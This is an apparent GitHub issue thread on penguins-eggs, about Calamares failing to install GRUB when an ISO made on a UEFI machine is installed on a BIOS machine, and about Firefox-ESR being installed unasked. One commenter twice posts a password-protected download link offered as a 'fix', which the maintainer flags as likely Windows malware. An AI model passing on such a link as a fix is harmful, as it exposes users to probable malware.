### ISSUE TITLE
Grub Bios does not install with calamares when creating the iso image from an efi machine, but it works the other way around.

### ISSUE THREAD

**Issue by catmasterX** [pieroproietti/penguins-eggs-legacy#383]
I have 2 main problems.
1. When trying to install the iso created from a uefi machine on a bios machine, calamares throws an error in the grub installation phase and stops the installation. If created in reverse it works perfectly.

2. firefox-esr installs after installing and rebooting the distribution, what is the reason?

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by pieroproietti** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/6mkbh6xhau31g password: changeme when you installing, you need to place a check in install to path and select "gcc."

@ but why? 

You jusrt send a poor link with Windows executables and probably virures ... this is really bad!

**Comment by pieroproietti** [comment]
Hi @catmasterX 

it seem you are using Debian, I can't confirm this problem. That version are you using? Someone can confirm?

**Comment by catmasterX** [comment]
@pieroproietti 
I tested with Debian Bookworm and Trixie. 
penguins-eggs_10.0.31-1

**Comment by pieroproietti** [comment]
Today I did another Release, and tested It on Debian bookworm on uefi and BIOS, can install in every cases. Tested with krill ( eggs install)

**Comment by catmasterX** [comment]
![image](https://github.com/user-attachments/assets/7e04a38a-8efa-4143-a26e-8dfe7c745717)
@pieroproietti My problem is with calamares, not with krill (no one installs with krill), right now I'm making a new iso.

I will let you know if the problem persists.

**Comment by catmasterX** [comment]
@pieroproietti installs correctly but still installs firefox-esr. :(
![image](https://github.com/user-attachments/assets/b38445df-0768-4cce-98ee-cfbcae562a4e)

**Comment by pieroproietti** [comment]
What Is the problem with firefox-esr, I must install Firefox?

**Comment by catmasterX** [comment]
@pieroproietti It installs itself and removes the google chrome that comes with my distribution. after installation of the system with calamares.

**Comment by catmasterX** [comment]
Again error trying to install an iso created from bios to uefi with calamares.

**Comment by catmasterX** [comment]
fixed, apparently penguin-eggs is not granting the necessary permissions to calamares, installing with sudo calamares is enough to avoid errors.
